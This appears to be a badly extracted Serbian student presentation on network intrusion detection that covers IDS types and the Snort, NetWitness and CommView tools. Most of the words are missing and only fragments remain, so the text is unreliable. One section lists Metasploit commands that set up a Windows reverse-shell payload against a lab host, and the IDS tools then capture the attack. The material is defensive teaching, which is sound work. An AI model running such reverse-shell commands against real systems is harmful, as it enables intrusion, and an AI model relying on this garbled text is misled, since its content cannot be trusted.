Visokotehnoloki kriminal tema DETEKCIJA NAPADA NA MREE
Visokotehnoloki kriminaltema:DETEKCIJA NAPADA NA
MREEStudenti:Stefan Ljubisavljevi 40/13Marko Todorovi 12/13
.
. .
(IDS Instrusion Detection System) - .
IDS :- ( IDS-, );- ( IDS- );- ( IDS- )
IDS ,
(Host Based Intrusion Detection System HIDS) -.
1:
(Network Intrusion Detection System NIDS ( ) .
2:
(Distribuited Intrusion Detection System DIDS) NIDS-, HIDS- ;-
;- ;- VPN .
3:
. (signature detection). IDS .
(anomaly detection). IDS .
SnortNetwitnessCommViewSnort
Snort . Snort :- ;-;- ;- ;- 45 . (capturing) . (packet capture
driver). Windows WinPcap, Linux- libpcap. , .
Netwitness
NetWitness . .
NetWitness Investigator IP . , Field Edition Field, .
7: Netwitness
CommView
CommView , , , .
IDS Snort-a Snort- Snort-a, , . WinPcap , snort.conf var
HOME_NET. var EXTERNAL_NET any.Snort : Sniffer, Packet logger
NIDS.
Sniffer . ICMP/TCP/UDP, : snort v i2. i2 .
8: Sniffer Snorta
NIDS Snort NIDS : snort dev l./log c snort.conf A fast i2.
snort.conf. Snort Linux, Windows snort.conf. .
NetWitness-a
( ). Username/Password NetWitness Framework.
WinPCap . NetWitness , . firewall- .
:Network Max Disc Usage ;Buffer Size (MB) MB ;Evidence Handling
Hash Captures
9: NetWitness
CommView-a
CommView LAN , , , e LAN-T .
CommView Ethernet , . dial-up , dial-up . Loopback TCP/IP .
IDS Metasploit Framework Metasploit Framework Windows Unix .N
exploit , , .
MSF:show exploits - exploits-a.use (exploit) - exploit
payloads-aset PAYLOAD windows/shell_reverse_tcp biramo payload
exploit. :set RHOST 192.168.116.128 set LHOST 192.168.116.129 show
targets, set TARGET 2 izbor eljene meteexploit - a exploit
exploit- IDS
, exploit .
exploita
Komandom ipconfig moemo videti IP .
exploita .
Snort IDS , Snort . C:\Snort\log.
Snort exploita
NetWitness-
exploit- ( ) ( ) NetWitness .
59: Netwitness exploita
NetWitness : IP (192.168.116.129), IP (192.168.116.128), IP (ms
command shell), (4444).
: Netwitness exploita
MSF-a NetWitness-a 61
: Netwitness exploita
62
62: Netwitness exploita
CommView-a
Exploit-a CommView .
64: Commview exploita
CommView . .
65: Commview exploit
!
